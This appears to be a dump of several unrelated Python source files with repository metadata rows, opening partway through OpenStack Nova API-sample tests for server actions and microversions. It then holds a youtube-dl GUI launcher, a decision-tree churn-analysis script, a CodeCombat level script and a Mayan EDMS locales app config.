        subs['hostname'] = r'[\w\.\-]+'
        subs['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
        subs['access_ip_v4'] = '1.2.3.4'
        subs['access_ip_v6'] = '80fe::'
        subs['user_data'] = (self.user_data if six.PY2
                             else self.user_data.decode('utf-8'))
        # config drive can be a string for True or empty value for False
        subs['cdrive'] = '.*'
        self._verify_response('servers-details-resp', subs, response, 200)
class ServersSampleJson23Test(ServersSampleJsonTest):
    """Run the base server sample tests at microversion 2.3."""
    microversion = '2.3'
    scenarios = [('v2_3', {'api_major_version': 'v2.1'})]
class ServersSampleJson29Test(ServersSampleJsonTest):
    """Run the base server sample tests at microversion 2.9."""
    microversion = '2.9'
    # NOTE(gmann): microversion tests do not need to run for v2 API
    # so defining scenarios only for v2.9 which will run the original tests
    # by appending '(v2_9)' in test_id.
    scenarios = [('v2_9', {'api_major_version': 'v2.1'})]
class ServersSampleJson216Test(ServersSampleJsonTest):
    """Run the base server sample tests at microversion 2.16."""
    microversion = '2.16'
    scenarios = [('v2_16', {'api_major_version': 'v2.1'})]
class ServersSampleJson219Test(ServersSampleJsonTest):
    """Microversion 2.19 samples: adds the server description field."""
    microversion = '2.19'
    scenarios = [('v2_19', {'api_major_version': 'v2.1'})]

    def test_servers_post(self):
        # Uses the 2.19-specific (non-common) request sample.
        return self._post_server(False)

    def test_servers_put(self):
        """Update a server and verify the PUT response sample."""
        uuid = self.test_servers_post()
        response = self._do_put('servers/%s' % uuid, 'server-put-req', {})
        subs = {
            'image_id': fake.get_valid_image_id(),
            'hostid': '[a-f0-9]+',
            'glance_host': self._get_glance_host(),
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::'
        }
        self._verify_response('server-put-resp', subs, response, 200)
class ServersSampleJson232Test(ServersSampleBase):
    """Microversion 2.32 samples: tagged attach at boot (create only)."""
    microversion = '2.32'
    sample_dir = 'servers'
    scenarios = [('v2_32', {'api_major_version': 'v2.1'})]

    def test_servers_post(self):
        self._post_server(use_common_server_api_samples=False)
class ServersSampleJson237Test(ServersSampleBase):
    """Microversion 2.37 samples: auto-allocated networking (create only)."""
    microversion = '2.37'
    sample_dir = 'servers'
    scenarios = [('v2_37', {'api_major_version': 'v2.1'})]

    def test_servers_post(self):
        self._post_server(use_common_server_api_samples=False)
class ServersSampleJson242Test(ServersSampleBase):
    """Microversion 2.42 samples (create only)."""
    microversion = '2.42'
    sample_dir = 'servers'
    scenarios = [('v2_42', {'api_major_version': 'v2.1'})]

    def test_servers_post(self):
        self._post_server(use_common_server_api_samples=False)
class ServersSampleJson247Test(ServersSampleJsonTest):
    """Microversion 2.47 samples: embedded flavor details; adds rebuild."""
    microversion = '2.47'
    scenarios = [('v2_47', {'api_major_version': 'v2.1'})]
    use_common_server_post = False

    def test_server_rebuild(self):
        """Rebuild a server and verify the rebuild response sample."""
        uuid = self._post_server()
        image = fake.get_valid_image_id()
        params = {
            'uuid': image,
            'name': 'foobar',
            'pass': 'seekr3t',
            'hostid': '[a-f0-9]+',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
        }

        resp = self._do_post('servers/%s/action' % uuid,
                             'server-action-rebuild', params)
        subs = params.copy()
        # 'uuid' is only a request substitution; not present in the response.
        del subs['uuid']
        self._verify_response('server-action-rebuild-resp', subs, resp, 202)
class ServersSampleJson252Test(ServersSampleJsonTest):
    """Run the base server sample tests at microversion 2.52."""
    microversion = '2.52'
    scenarios = [('v2_52', {'api_major_version': 'v2.1'})]
    use_common_server_post = False
class ServersSampleJson263Test(ServersSampleBase):
    """Microversion 2.63 samples: trusted image certificates."""
    microversion = '2.63'
    scenarios = [('v2_63', {'api_major_version': 'v2.1'})]

    def setUp(self):
        super(ServersSampleJson263Test, self).setUp()
        # Substitutions shared by all response verifications below.
        self.common_subs = {
            'hostid': '[a-f0-9]+',
            'instance_name': 'instance-\d{8}',
            'hypervisor_hostname': r'[\w\.\-]+',
            'hostname': r'[\w\.\-]+',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
            'user_data': (self.user_data if six.PY2
                          else self.user_data.decode('utf-8')),
            'cdrive': '.*',
        }

    def test_servers_post(self):
        self._post_server(use_common_server_api_samples=False)

    def test_server_rebuild(self):
        """Rebuild with key_name/description and verify the sample."""
        uuid = self._post_server(use_common_server_api_samples=False)
        fakes.stub_out_key_pair_funcs(self)
        image = fake.get_valid_image_id()
        params = {
            'uuid': image,
            'name': 'foobar',
            'key_name': 'new-key',
            'description': 'description of foobar',
            'pass': 'seekr3t',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
        }

        resp = self._do_post('servers/%s/action' % uuid,
                             'server-action-rebuild', params)

        exp_resp = params.copy()
        # 'uuid' is only a request substitution; not present in the response.
        del exp_resp['uuid']
        exp_resp['hostid'] = '[a-f0-9]+'

        self._verify_response('server-action-rebuild-resp',
                              exp_resp, resp, 202)

    def test_servers_details(self):
        uuid = self._post_server(use_common_server_api_samples=False)
        response = self._do_get('servers/detail?limit=1')

        subs = self.common_subs.copy()
        subs['id'] = uuid
        self._verify_response('servers-details-resp', subs, response, 200)

    def test_server_get(self):
        uuid = self._post_server(use_common_server_api_samples=False)
        response = self._do_get('servers/%s' % uuid)

        subs = self.common_subs.copy()
        subs['id'] = uuid
        self._verify_response('server-get-resp', subs, response, 200)

    def test_server_update(self):
        uuid = self._post_server(use_common_server_api_samples=False)
        subs = self.common_subs.copy()
        subs['id'] = uuid
        response = self._do_put('servers/%s' % uuid,
                                'server-update-req', subs)
        self._verify_response('server-update-resp', subs, response, 200)
class ServersSampleJson266Test(ServersSampleBase):
    """API samples tests for the changes-before filter (microversion 2.66)."""
    microversion = '2.66'
    scenarios = [('v2_66', {'api_major_version': 'v2.1'})]
    def setUp(self):
        super(ServersSampleJson266Test, self).setUp()
        # Response-template substitutions shared by the tests below; the
        # values are regular expressions, hence the raw strings.
        self.common_subs = {
            'hostid': '[a-f0-9]+',
            # raw string: '\d' is an invalid escape in a plain str literal
            'instance_name': r'instance-\d{8}',
            'hypervisor_hostname': r'[\w\.\-]+',
            'hostname': r'[\w\.\-]+',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
            'user_data': (self.user_data if six.PY2
                          else self.user_data.decode('utf-8')),
            'cdrive': '.*',
        }
    def test_get_servers_list_with_changes_before(self):
        """List servers filtered by changes-before and verify the sample."""
        uuid = self._post_server(use_common_server_api_samples=False)
        current_time = timeutils.parse_isotime(timeutils.utcnow().isoformat())
        response = self._do_get(
            'servers?changes-before=%s' % timeutils.normalize_time(
                current_time))
        subs = self.common_subs.copy()
        subs['id'] = uuid
        self._verify_response(
            'servers-list-with-changes-before', subs, response, 200)
    def test_get_servers_detail_with_changes_before(self):
        """Detailed server list filtered by changes-before; verify sample."""
        uuid = self._post_server(use_common_server_api_samples=False)
        current_time = timeutils.parse_isotime(timeutils.utcnow().isoformat())
        response = self._do_get(
            'servers/detail?changes-before=%s' % timeutils.normalize_time(
                current_time))
        subs = self.common_subs.copy()
        subs['id'] = uuid
        self._verify_response(
            'servers-details-with-changes-before', subs, response, 200)
class ServersSampleJson267Test(ServersSampleBase):
    """API samples test for server create at microversion 2.67."""
    microversion = '2.67'
    scenarios = [('v2_67', {'api_major_version': 'v2.1'})]
    def setUp(self):
        super(ServersSampleJson267Test, self).setUp()
        # Use the new-style Cinder attach-flow fixture for volume handling.
        self.useFixture(nova_fixtures.CinderFixtureNewAttachFlow(self))
    def test_servers_post(self):
        return self._post_server(use_common_server_api_samples=False)
class ServersSampleJson269Test(ServersSampleBase):
    """API samples tests for server list/show with down cells (2.69)."""
    microversion = '2.69'
    scenarios = [('v2_69', {'api_major_version': 'v2.1'})]
    def setUp(self):
        super(ServersSampleJson269Test, self).setUp()
        def _fake_instancemapping_get_by_cell_and_project(*args, **kwargs):
            # global cell based on which rest of the functions are stubbed out
            cell_fixture = nova_fixtures.SingleCellSimple()
            return [{
                'id': 1,
                'updated_at': None,
                'created_at': None,
                'instance_uuid': utils_fixture.uuidsentinel.inst,
                'cell_id': 1,
                'project_id': "6f70656e737461636b20342065766572",
                'cell_mapping': cell_fixture._fake_cell_list()[0],
                'queued_for_delete': False
            }]
        # Stub the instance-mapping DB query so listings still find the
        # instance while its cell is "down".
        self.stub_out('nova.objects.InstanceMappingList.'
                      '_get_not_deleted_by_cell_and_project_from_db',
                      _fake_instancemapping_get_by_cell_and_project)
    def test_servers_list_from_down_cells(self):
        uuid = self._post_server(use_common_server_api_samples=False)
        # DownCellFixture makes the cell appear unreachable for the GET.
        with nova_fixtures.DownCellFixture():
            response = self._do_get('servers')
        subs = {'id': uuid}
        self._verify_response('servers-list-resp', subs, response, 200)
    def test_servers_details_from_down_cells(self):
        uuid = self._post_server(use_common_server_api_samples=False)
        with nova_fixtures.DownCellFixture():
            response = self._do_get('servers/detail')
        subs = {'id': uuid}
        self._verify_response('servers-details-resp', subs, response, 200)
    def test_server_get_from_down_cells(self):
        uuid = self._post_server(use_common_server_api_samples=False)
        with nova_fixtures.DownCellFixture():
            response = self._do_get('servers/%s' % uuid)
        subs = {'id': uuid}
        self._verify_response('server-get-resp', subs, response, 200)
class ServersSampleJson271Test(ServersSampleBase):
    """API samples tests for servers with server groups (microversion 2.71)."""
    microversion = '2.71'
    scenarios = [('v2_71', {'api_major_version': 'v2.1'})]
    def setUp(self):
        super(ServersSampleJson271Test, self).setUp()
        # Response-template substitutions shared by the tests below; the
        # values are regular expressions, hence the raw strings.
        self.common_subs = {
            'hostid': '[a-f0-9]+',
            # raw string: '\d' is an invalid escape in a plain str literal
            'instance_name': r'instance-\d{8}',
            'hypervisor_hostname': r'[\w\.\-]+',
            'hostname': r'[\w\.\-]+',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
            'user_data': (self.user_data if six.PY2
                          else self.user_data.decode('utf-8')),
            'cdrive': '.*',
        }
        # create server group
        subs = {'name': 'test'}
        response = self._do_post('os-server-groups',
                                 'server-groups-post-req', subs)
        self.sg_uuid = self._verify_response('server-groups-post-resp',
                                             subs, response, 200)
    def _test_servers_post(self):
        # Create a server inside the server group made in setUp().
        return self._post_server(
            use_common_server_api_samples=False,
            extra_subs={'sg_uuid': self.sg_uuid})
    def test_servers_get_with_server_group(self):
        uuid = self._test_servers_post()
        response = self._do_get('servers/%s' % uuid)
        subs = self.common_subs.copy()
        subs['id'] = uuid
        self._verify_response('server-get-resp', subs, response, 200)
    def test_servers_update_with_server_groups(self):
        uuid = self._test_servers_post()
        subs = self.common_subs.copy()
        subs['id'] = uuid
        response = self._do_put('servers/%s' % uuid,
                                'server-update-req', subs)
        self._verify_response('server-update-resp', subs, response, 200)
    def test_servers_rebuild_with_server_groups(self):
        uuid = self._test_servers_post()
        fakes.stub_out_key_pair_funcs(self)
        image = fake.get_valid_image_id()
        params = {
            'uuid': image,
            'name': 'foobar',
            'key_name': 'new-key',
            'description': 'description of foobar',
            'pass': 'seekr3t',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
        }
        resp = self._do_post('servers/%s/action' % uuid,
                             'server-action-rebuild', params)
        subs = self.common_subs.copy()
        subs.update(params)
        subs['id'] = uuid
        # 'uuid' is a request-only substitution; not in the response body.
        del subs['uuid']
        self._verify_response('server-action-rebuild-resp', subs, resp, 202)
    def test_server_get_from_down_cells(self):
        def _fake_instancemapping_get_by_cell_and_project(*args, **kwargs):
            # global cell based on which rest of the functions are stubbed out
            cell_fixture = nova_fixtures.SingleCellSimple()
            return [{
                'id': 1,
                'updated_at': None,
                'created_at': None,
                'instance_uuid': utils_fixture.uuidsentinel.inst,
                'cell_id': 1,
                'project_id': "6f70656e737461636b20342065766572",
                'cell_mapping': cell_fixture._fake_cell_list()[0],
                'queued_for_delete': False
            }]
        self.stub_out('nova.objects.InstanceMappingList.'
                      '_get_not_deleted_by_cell_and_project_from_db',
                      _fake_instancemapping_get_by_cell_and_project)
        uuid = self._test_servers_post()
        # DownCellFixture makes the cell appear unreachable for the GET.
        with nova_fixtures.DownCellFixture():
            response = self._do_get('servers/%s' % uuid)
        subs = {'id': uuid}
        self._verify_response('server-get-down-cell-resp',
                              subs, response, 200)
class ServersUpdateSampleJsonTest(ServersSampleBase):
    """API samples test for updating a server (PUT /servers/{id})."""
    def test_update_server(self):
        """Update a server and verify the response against the sample."""
        server_id = self._post_server()
        # Template substitutions; regex-style values are matched against
        # the response body by _verify_response.
        template_subs = {
            'hostid': '[a-f0-9]+',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
        }
        response = self._do_put(
            'servers/%s' % server_id, 'server-update-req', template_subs)
        self._verify_response(
            'server-update-resp', template_subs, response, 200)
class ServersUpdateSampleJson247Test(ServersUpdateSampleJsonTest):
    """Re-runs the server update sample test at microversion 2.47."""
    microversion = '2.47'
    scenarios = [('v2_47', {'api_major_version': 'v2.1'})]
class ServerSortKeysJsonTests(ServersSampleBase):
    """API samples test for listing servers with sort parameters."""
    sample_dir = 'servers-sort'
    def test_servers_list(self):
        self._post_server()
        response = self._do_get('servers?sort_key=display_name&sort_dir=asc')
        self._verify_response('server-sort-keys-list-resp', {}, response,
                              200)
class _ServersActionsJsonTestMixin(object):
    """Helper mixin: POST a server action and verify the response."""
    def _test_server_action(self, uuid, action, req_tpl,
                            subs=None, resp_tpl=None, code=202):
        """POST `action` to the server and check the response.

        If resp_tpl is given, the body is verified against that API
        sample; otherwise an empty body with status `code` is expected.
        """
        subs = subs or {}
        subs.update({'action': action,
                     'glance_host': self._get_glance_host()})
        response = self._do_post('servers/%s/action' % uuid,
                                 req_tpl,
                                 subs)
        if resp_tpl:
            self._verify_response(resp_tpl, subs, response, code)
        else:
            self.assertEqual(code, response.status_code)
            self.assertEqual("", response.text)
        return response
class ServersActionsJsonTest(ServersSampleBase, _ServersActionsJsonTestMixin):
    """API samples tests for reboot/rebuild/resize server actions."""
    USE_NEUTRON = True
    def test_server_reboot_hard(self):
        uuid = self._post_server()
        self._test_server_action(uuid, "reboot",
                                 'server-action-reboot',
                                 {"type": "HARD"})
    def test_server_reboot_soft(self):
        uuid = self._post_server()
        self._test_server_action(uuid, "reboot",
                                 'server-action-reboot',
                                 {"type": "SOFT"})
    def test_server_rebuild(self):
        uuid = self._post_server()
        image = fake.get_valid_image_id()
        params = {
            'uuid': image,
            'name': 'foobar',
            'pass': 'seekr3t',
            'hostid': '[a-f0-9]+',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
        }
        resp = self._do_post('servers/%s/action' % uuid,
                             'server-action-rebuild', params)
        subs = params.copy()
        # 'uuid' is a request-only substitution; not in the response body.
        del subs['uuid']
        self._verify_response('server-action-rebuild-resp', subs, resp, 202)
    def test_server_resize(self):
        # Single-node test environment: allow resizing to the same host.
        self.flags(allow_resize_to_same_host=True)
        uuid = self._post_server()
        self._test_server_action(uuid, "resize",
                                 'server-action-resize',
                                 {"id": '2',
                                  "host": self._get_host()})
        # Returned so revert/confirm tests can reuse the resized server.
        return uuid
    def test_server_revert_resize(self):
        uuid = self.test_server_resize()
        self._test_server_action(uuid, "revertResize",
                                 'server-action-revert-resize')
    def test_server_confirm_resize(self):
        uuid = self.test_server_resize()
        self._test_server_action(uuid, "confirmResize",
                                 'server-action-confirm-resize',
                                 code=204)
class ServersActionsJsonTestNovaNet(
        ServersSampleBase, _ServersActionsJsonTestMixin):
    """Floating-IP action samples that rely on nova-network stubs."""
    # TODO(gibi): fix the tests to work with neutron as nova net is deprecated
    USE_NEUTRON = False
    def _wait_for_active_server(self, uuid):
        """Wait 10 seconds for the server to be ACTIVE, else fail.
        :param uuid: The server id.
        :returns: The ACTIVE server.
        """
        server = self._do_get('servers/%s' % uuid,
                              return_json_body=True)['server']
        count = 0
        while server['status'] != 'ACTIVE' and count < 10:
            time.sleep(1)
            server = self._do_get('servers/%s' % uuid,
                                  return_json_body=True)['server']
            count += 1
        if server['status'] != 'ACTIVE':
            self.fail('Timed out waiting for server %s to be ACTIVE.' % uuid)
        return server
    def test_server_add_floating_ip(self):
        uuid = self._post_server()
        # Get the server details so we can find a fixed IP to use in the
        # addFloatingIp request.
        server = self._wait_for_active_server(uuid)
        addresses = server['addresses']
        # Find a fixed IP.
        fixed_address = None
        for network, ips in addresses.items():
            for ip in ips:
                if ip['OS-EXT-IPS:type'] == 'fixed':
                    fixed_address = ip['addr']
                    break
            if fixed_address:
                break
        if fixed_address is None:
            self.fail('Failed to find a fixed IP for server %s in addresses: '
                      '%s' % (uuid, addresses))
        subs = {
            "address": "10.10.10.10",
            "fixed_address": fixed_address
        }
        # This is gross, but we need to stub out the associate_floating_ip
        # call in the FloatingIPActionController since we don't have a real
        # networking service backing this up, just the fake nova-network stubs.
        self.stub_out('nova.network.api.API.associate_floating_ip',
                      lambda *a, **k: None)
        self._test_server_action(uuid, 'addFloatingIp',
                                 'server-action-addfloatingip-req', subs)
    def test_server_remove_floating_ip(self):
        server_uuid = self._post_server()
        self._wait_for_active_server(server_uuid)
        subs = {
            "address": "172.16.10.7"
        }
        # Stub out the nova-network lookups used by removeFloatingIp.
        self.stub_out('nova.network.api.API.get_floating_ip_by_address',
                      lambda *a, **k: {'fixed_ip_id':
                                       'a0c566f0-faab-406f-b77f-2b286dc6dd7e'})
        self.stub_out(
            'nova.network.api.API.get_instance_id_by_floating_address',
            lambda *a, **k: server_uuid)
        self.stub_out('nova.network.api.API.disassociate_floating_ip',
                      lambda *a, **k: None)
        self._test_server_action(server_uuid, 'removeFloatingIp',
                                 'server-action-removefloatingip-req', subs)
class ServersActionsJson219Test(ServersSampleBase):
    """Rebuild action samples at microversion 2.19."""
    microversion = '2.19'
    scenarios = [('v2_19', {'api_major_version': 'v2.1'})]
    def test_server_rebuild(self):
        uuid = self._post_server()
        image = fake.get_valid_image_id()
        params = {
            'uuid': image,
            'name': 'foobar',
            'description': 'description of foobar',
            'pass': 'seekr3t',
            'hostid': '[a-f0-9]+',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
        }
        resp = self._do_post('servers/%s/action' % uuid,
                             'server-action-rebuild', params)
        subs = params.copy()
        # 'uuid' is a request-only substitution; not in the response body.
        del subs['uuid']
        self._verify_response('server-action-rebuild-resp', subs, resp, 202)
class ServersActionsJson226Test(ServersSampleBase):
    """Rebuild action samples at microversion 2.26 (server tags)."""
    microversion = '2.26'
    scenarios = [('v2_26', {'api_major_version': 'v2.1'})]
    def test_server_rebuild(self):
        uuid = self._post_server()
        image = fake.get_valid_image_id()
        params = {
            'uuid': image,
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
            'disk_config': 'AUTO',
            'hostid': '[a-f0-9]+',
            'name': 'foobar',
            'pass': 'seekr3t',
            'preserve_ephemeral': 'false',
            'description': 'description of foobar'
        }
        # Add 'tag1' and 'tag2' tags
        self._do_put('servers/%s/tags/tag1' % uuid)
        self._do_put('servers/%s/tags/tag2' % uuid)
        # Rebuild Action
        resp = self._do_post('servers/%s/action' % uuid,
                             'server-action-rebuild', params)
        subs = params.copy()
        # 'uuid' is a request-only substitution; not in the response body.
        del subs['uuid']
        self._verify_response('server-action-rebuild-resp', subs, resp, 202)
class ServersActionsJson254Test(ServersSampleBase):
    """Rebuild action samples at microversion 2.54 (key_name on rebuild)."""
    microversion = '2.54'
    sample_dir = 'servers'
    scenarios = [('v2_54', {'api_major_version': 'v2.1'})]
    def _create_server(self):
        # Hook for subclasses that need version-specific create samples.
        return self._post_server()
    def test_server_rebuild(self):
        fakes.stub_out_key_pair_funcs(self)
        uuid = self._create_server()
        image = fake.get_valid_image_id()
        params = {
            'uuid': image,
            'name': 'foobar',
            'key_name': 'new-key',
            'description': 'description of foobar',
            'pass': 'seekr3t',
            'hostid': '[a-f0-9]+',
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
        }
        resp = self._do_post('servers/%s/action' % uuid,
                             'server-action-rebuild', params)
        subs = params.copy()
        # 'uuid' is a request-only substitution; not in the response body.
        del subs['uuid']
        self._verify_response('server-action-rebuild-resp', subs, resp, 202)
class ServersActionsJson257Test(ServersActionsJson254Test):
    """Tests rebuilding a server with new user_data."""
    microversion = '2.57'
    scenarios = [('v2_57', {'api_major_version': 'v2.1'})]
    def _create_server(self):
        # Use the version-specific request sample instead of the common one.
        return self._post_server(use_common_server_api_samples=False)
class ServersCreateImageJsonTest(ServersSampleBase,
                                 _ServersActionsJsonTestMixin):
    """Tests the createImage server action API against 2.1."""
    def test_server_create_image(self):
        uuid = self._post_server()
        # 'name' is the snapshot image name substituted into the request.
        resp = self._test_server_action(uuid, 'createImage',
                                        'server-action-create-image',
                                        {'name': 'foo-image'})
        # we should have gotten a location header back
        self.assertIn('location', resp.headers)
        # we should not have gotten a body back
        self.assertEqual(0, len(resp.content))
class ServersCreateImageJsonTestv2_45(ServersCreateImageJsonTest):
    """Tests the createImage server action API against 2.45."""
    microversion = '2.45'
    scenarios = [('v2_45', {'api_major_version': 'v2.1'})]
    def test_server_create_image(self):
        uuid = self._post_server()
        # At 2.45 the action response body is verified against a sample.
        resp = self._test_server_action(
            uuid, 'createImage', 'server-action-create-image',
            {'name': 'foo-image'}, 'server-action-create-image-resp')
        # assert that no location header was returned
        self.assertNotIn('location', resp.headers)
class ServerStartStopJsonTest(ServersSampleBase):
    """API samples tests for the os-start/os-stop server actions."""
    def _test_server_action(self, uuid, action, req_tpl):
        """POST the action request template; expect an empty 202 reply."""
        url = 'servers/%s/action' % uuid
        response = self._do_post(url, req_tpl, {'action': action})
        self.assertEqual(202, response.status_code)
        self.assertEqual("", response.text)
    def test_server_start(self):
        # A server must be stopped before it can be started again.
        server_id = self._post_server()
        self._test_server_action(server_id, 'os-stop', 'server-action-stop')
        self._test_server_action(server_id, 'os-start', 'server-action-start')
    def test_server_stop(self):
        server_id = self._post_server()
        self._test_server_action(server_id, 'os-stop', 'server-action-stop')
class ServersSampleMultiStatusJsonTest(ServersSampleBase):
    """API samples test for listing servers filtered by multiple statuses."""
    def test_servers_list(self):
        uuid = self._post_server()
        response = self._do_get('servers?limit=1&status=active&status=error')
        subs = {'id': uuid, 'status': 'error'}
        self._verify_response('servers-list-status-resp', subs, response, 200)
class ServerTriggerCrashDumpJsonTest(ServersSampleBase):
    """API samples test for the trigger_crash_dump action (2.17)."""
    microversion = '2.17'
    scenarios = [('v2_17', {'api_major_version': 'v2.1'})]
    def test_trigger_crash_dump(self):
        uuid = self._post_server()
        response = self._do_post('servers/%s/action' % uuid,
                                 'server-action-trigger-crash-dump',
                                 {})
        # The action is asynchronous: 202 with an empty body.
        self.assertEqual(response.status_code, 202)
        self.assertEqual(response.text, "")
| 37.638173 | 79 | 0.593131 |
795c67d2421a273cab1c570b6a0a74aa56dc60d8 | 69 | py | Python | VideoDownloader.py | zhuduan/youtube-dl-gui | 77a1fe1d49a157e8f2a06f3d04a2b43d7d2cbbce | [
"Unlicense"
] | 4 | 2018-12-12T07:53:41.000Z | 2019-02-03T11:05:16.000Z | VideoDownloader.py | zhuduan/youtube-dl-gui | 77a1fe1d49a157e8f2a06f3d04a2b43d7d2cbbce | [
"Unlicense"
] | null | null | null | VideoDownloader.py | zhuduan/youtube-dl-gui | 77a1fe1d49a157e8f2a06f3d04a2b43d7d2cbbce | [
"Unlicense"
] | 1 | 2019-02-10T08:54:00.000Z | 2019-02-10T08:54:00.000Z | # -*- coding: utf-8 -*-
import youtube_dl_gui
# Guard so that importing this module does not launch the GUI; only run
# the application when executed directly as a script.
if __name__ == '__main__':
    youtube_dl_gui.main()
795c680ab2684cf05ad3e71c9cb77a3a5a746f98 | 1,840 | py | Python | dtree_visualization.py | parwisenlared/Churn_analysis | a2c0e36fa3b6d12cefced05bde7b922a05722f67 | [
"MIT"
] | null | null | null | dtree_visualization.py | parwisenlared/Churn_analysis | a2c0e36fa3b6d12cefced05bde7b922a05722f67 | [
"MIT"
] | null | null | null | dtree_visualization.py | parwisenlared/Churn_analysis | a2c0e36fa3b6d12cefced05bde7b922a05722f67 | [
"MIT"
] | null | null | null | import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report,confusion_matrix
from sklearn.tree import DecisionTreeClassifier
from IPython.display import Image
from sklearn.externals.six import StringIO
from sklearn.tree import export_graphviz
import pydot
from sklearn import tree
import pydotplus
# Load the survey responses. X holds the satisfaction answers (features);
# y holds only the 'Churn' target column.
data = pd.read_csv("user_satisfaction_survey.csv")
X = data.drop(['Churn','ID','Classes_per_week'], axis=1) # drop target, ID and unused column
y = data.drop(['ID','Classes_per_week','Happy_with_instructors','Happy_with_class_duration','Happy_with_class_timings','Happy_with_class_size','Happy_with_facilities','Happy_with_price'],axis=1) # keep only 'Churn'
def convert_yes_no(text):
    """Map a Yes/No survey answer to an integer.

    Any string containing the substring 'Yes' maps to 1; everything else
    (including 'No' and empty strings) maps to 0.
    """
    return 1 if 'Yes' in text else 0
# Encode the Yes/No survey answers (and the Churn target) as 1/0 integers.
X.Happy_with_instructors = X.Happy_with_instructors.apply(convert_yes_no)
X.Happy_with_class_duration = X.Happy_with_class_duration.apply(convert_yes_no)
X.Happy_with_class_timings = X.Happy_with_class_timings.apply(convert_yes_no)
X.Happy_with_class_size = X.Happy_with_class_size.apply(convert_yes_no)
X.Happy_with_facilities = X.Happy_with_facilities.apply(convert_yes_no)
X.Happy_with_price = X.Happy_with_price.apply(convert_yes_no)
y.Churn = y.Churn.apply(convert_yes_no)
def plot_dtree(model, feature_name):
    """Render a fitted decision tree with Graphviz.

    Writes the drawing to 'dt_visualization.png' and returns an IPython
    Image of it for inline notebook display.
    """
    dot_data = StringIO()
    tree.export_graphviz(model, out_file=dot_data,
                         feature_names=feature_name,
                         filled=True,
                         rounded=True,
                         )
    graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
    graph.write_png("dt_visualization.png")
    return Image(graph.create_png())
# Fit a decision tree on the full dataset (no train/test split here,
# despite the _train names) and render it to a PNG.
X_train = X
Y_train = y
model = tree.DecisionTreeClassifier()
model = model.fit(X_train,Y_train)
plot_dtree(model, X_train.columns)
795c684e755b76bc868038a9ecfc7eaa91e449f4 | 215 | py | Python | 7_Sarven_Desert/298-Odd_Sandstorm/odd_sandstorm.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 7_Sarven_Desert/298-Odd_Sandstorm/odd_sandstorm.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 7_Sarven_Desert/298-Odd_Sandstorm/odd_sandstorm.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | everybody = ['Yetu', 'Tabitha', 'Rasha', 'Max', 'Yazul', 'Todd']
enemyIndex = 0
while enemyIndex < everybody.length:
ogre = everybody[enemyIndex]
hero.attack(ogre)
enemyIndex += 2
hero.moveXY(35, 54)
| 21.5 | 65 | 0.651163 |
795c68d935f060555dbba4756549e650afc0c462 | 1,511 | py | Python | mayan/apps/locales/apps.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 2 | 2021-09-12T19:41:19.000Z | 2021-09-12T19:41:20.000Z | mayan/apps/locales/apps.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 37 | 2021-09-13T01:00:12.000Z | 2021-10-02T03:54:30.000Z | mayan/apps/locales/apps.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:17:30.000Z | 2021-09-22T13:17:30.000Z | import logging
from django.conf import settings
from django.contrib.auth.signals import user_logged_in
from django.db.models.signals import post_save
from django.utils.translation import ugettext_lazy as _
from mayan.apps.common.apps import MayanAppConfig
from mayan.apps.common.menus import menu_user
from .handlers import (
handler_user_locale_profile_session_config,
handler_user_locale_profile_create
)
from .links import link_current_user_locale_profile_details, link_current_user_locale_profile_edit
from .patches import patchDjangoTranslation
logger = logging.getLogger(name=__name__)
class LocalesApp(MayanAppConfig):
    """Mayan EDMS app config for per-user locale profiles."""
    app_namespace = 'locales'
    app_url = 'locales'
    has_rest_api = False
    has_tests = False
    name = 'mayan.apps.locales'
    verbose_name = _('Locales')
    def ready(self):
        """Wire menus and signal handlers once the app registry is ready."""
        super().ready()
        patchDjangoTranslation()
        # Expose the locale profile view/edit links in the user menu.
        menu_user.bind_links(
            links=(
                link_current_user_locale_profile_details, link_current_user_locale_profile_edit,
            ), position=50
        )
        # Run the locale-profile-create handler whenever a user is saved.
        post_save.connect(
            dispatch_uid='common_handler_user_locale_profile_create',
            receiver=handler_user_locale_profile_create,
            sender=settings.AUTH_USER_MODEL
        )
        # Apply the user's locale profile to the session on login.
        user_logged_in.connect(
            dispatch_uid='common_handler_user_locale_profile_session_config',
            receiver=handler_user_locale_profile_session_config
        )
795c6938c9f19246b74ce5384b7478525638a6a6 | 289 | py | Python | sam/entrypoint.py | cssat/sam-iam | 8ad7f67d19fda8b5b9c08e4d3bbb57d429c45fda | [
"MIT"
] | 4 | 2019-06-17T20:54:03.000Z | 2020-10-09T22:42:21.000Z | sam/entrypoint.py | cssat/sam-iam | 8ad7f67d19fda8b5b9c08e4d3bbb57d429c45fda | [
"MIT"
